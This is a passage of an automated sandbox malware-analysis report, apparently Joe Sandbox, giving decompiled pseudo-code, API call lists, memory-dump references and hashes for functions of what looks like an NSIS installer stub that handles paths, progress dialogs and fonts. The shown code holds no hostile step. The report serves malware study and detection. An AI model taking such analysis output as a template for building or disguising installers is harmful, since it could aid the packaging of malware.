                                                                                                                                                                                                                            0x0040285d
                                                                                                                                                                                                                            0x0040285d
                                                                                                                                                                                                                            0x00402860
                                                                                                                                                                                                                            0x00402863
                                                                                                                                                                                                                            0x00402866
                                                                                                                                                                                                                            0x00402866
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402817
                                                                                                                                                                                                                            0x00402817
                                                                                                                                                                                                                            0x0040281a
                                                                                                                                                                                                                            0x0040281d
                                                                                                                                                                                                                            0x00402823
                                                                                                                                                                                                                            0x00402827
                                                                                                                                                                                                                            0x0040282a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040282a
                                                                                                                                                                                                                            0x0040280e
                                                                                                                                                                                                                            0x00402807
                                                                                                                                                                                                                            0x0040277f
                                                                                                                                                                                                                            0x0040276b
                                                                                                                                                                                                                            0x00402760
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040282c
                                                                                                                                                                                                                            0x0040282c
                                                                                                                                                                                                                            0x0040282f
                                                                                                                                                                                                                            0x00402838
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040272f
                                                                                                                                                                                                                            0x0040271a
                                                                                                                                                                                                                            0x00402c33
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                            • String ID: 9
                                                                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                                                                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                                                                            0x004068f1
                                                                                                                                                                                                                            0x004068fa
                                                                                                                                                                                                                            0x00406911
                                                                                                                                                                                                                            0x00406911
                                                                                                                                                                                                                            0x00406918
                                                                                                                                                                                                                            0x00406924
                                                                                                                                                                                                                            0x00406924
                                                                                                                                                                                                                            0x00406927
                                                                                                                                                                                                                            0x0040692a
                                                                                                                                                                                                                            0x0040692f
                                                                                                                                                                                                                            0x00406931
                                                                                                                                                                                                                            0x0040693a
                                                                                                                                                                                                                            0x0040693e
                                                                                                                                                                                                                            0x0040695b
                                                                                                                                                                                                                            0x00406963
                                                                                                                                                                                                                            0x00406963
                                                                                                                                                                                                                            0x00406968
                                                                                                                                                                                                                            0x0040696a
                                                                                                                                                                                                                            0x0040696d
                                                                                                                                                                                                                            0x00406972
                                                                                                                                                                                                                            0x00406973
                                                                                                                                                                                                                            0x00406977
                                                                                                                                                                                                                            0x00406977
                                                                                                                                                                                                                            0x00406978
                                                                                                                                                                                                                            0x0040697f
                                                                                                                                                                                                                            0x00406981
                                                                                                                                                                                                                            0x00406988
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406990
                                                                                                                                                                                                                            0x00406996
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406996
                                                                                                                                                                                                                            0x0040699b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                                                                                                            • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 589700163-2982765560
                                                                                                                                                                                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                                                                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a26c;
				if(_t6 >  *0x42a26c) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                                                                                                                                                            0x0040303d
                                                                                                                                                                                                                            0x0040303f
                                                                                                                                                                                                                            0x00403046
                                                                                                                                                                                                                            0x00403049
                                                                                                                                                                                                                            0x00403049
                                                                                                                                                                                                                            0x0040304f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040304f
                                                                                                                                                                                                                            0x00403057
                                                                                                                                                                                                                            0x0040305d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403060
                                                                                                                                                                                                                            0x00403067
                                                                                                                                                                                                                            0x0040306d
                                                                                                                                                                                                                            0x00403073
                                                                                                                                                                                                                            0x00403075
                                                                                                                                                                                                                            0x0040307b
                                                                                                                                                                                                                            0x004030b9
                                                                                                                                                                                                                            0x004030c2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004030c7
                                                                                                                                                                                                                            0x0040307d
                                                                                                                                                                                                                            0x00403084
                                                                                                                                                                                                                            0x00403095
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004030a3
                                                                                                                                                                                                                            0x00403084
                                                                                                                                                                                                                            0x004030cf

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00403095
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            • CreateDialogParamW.USER32 ref: 004030B9
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                                                                                                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(0005CD09,00000064,0005CFCE), ref: 00403027
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                                                                            • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                                                                                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                                                                            0x00404f8d
                                                                                                                                                                                                                            0x00404f9a
                                                                                                                                                                                                                            0x00404fa0
                                                                                                                                                                                                                            0x00404fde
                                                                                                                                                                                                                            0x00404fde
                                                                                                                                                                                                                            0x00404fed
                                                                                                                                                                                                                            0x00404ff4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404ff6
                                                                                                                                                                                                                            0x00404fa2
                                                                                                                                                                                                                            0x00404fb1
                                                                                                                                                                                                                            0x00404fb9
                                                                                                                                                                                                                            0x00404fbc
                                                                                                                                                                                                                            0x00404fce
                                                                                                                                                                                                                            0x00404fd4
                                                                                                                                                                                                                            0x00404fdb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404fdb
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                                                                                                                                                                                            • ScreenToClient.USER32 ref: 00404FBC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                                                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                                                                            0x00401e4e
                                                                                                                                                                                                                            0x00401e59
                                                                                                                                                                                                                            0x00401e5b
                                                                                                                                                                                                                            0x00401e68
                                                                                                                                                                                                                            0x00401e7f
                                                                                                                                                                                                                            0x00401e84
                                                                                                                                                                                                                            0x00401e91
                                                                                                                                                                                                                            0x00401e96
                                                                                                                                                                                                                            0x00401e9a
                                                                                                                                                                                                                            0x00401ea5
                                                                                                                                                                                                                            0x00401eac
                                                                                                                                                                                                                            0x00401ebe
                                                                                                                                                                                                                            0x00401ec4
                                                                                                                                                                                                                            0x00401ec9
                                                                                                                                                                                                                            0x00401ed3
                                                                                                                                                                                                                            0x00402638
                                                                                                                                                                                                                            0x0040156d
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                            • ReleaseDC.USER32 ref: 00401E84
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                            • String ID: Times New Roman
                                                                                                                                                                                                                            • API String ID: 2584051700-927190056
                                                                                                                                                                                                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                                                                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                                                                                                            0x00402fa3
                                                                                                                                                                                                                            0x00402fb1
                                                                                                                                                                                                                            0x00402fb7
                                                                                                                                                                                                                            0x00402fb7
                                                                                                                                                                                                                            0x00402fc5
                                                                                                                                                                                                                            0x00402fc7
                                                                                                                                                                                                                            0x00402fd3
                                                                                                                                                                                                                            0x00402fd8
                                                                                                                                                                                                                            0x00402fda
                                                                                                                                                                                                                            0x00402fda
                                                                                                                                                                                                                            0x00402fe5
                                                                                                                                                                                                                            0x00402ff5
                                                                                                                                                                                                                            0x00403007
                                                                                                                                                                                                                            0x00403007
                                                                                                                                                                                                                            0x0040300f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00402FE5
                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00403007
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
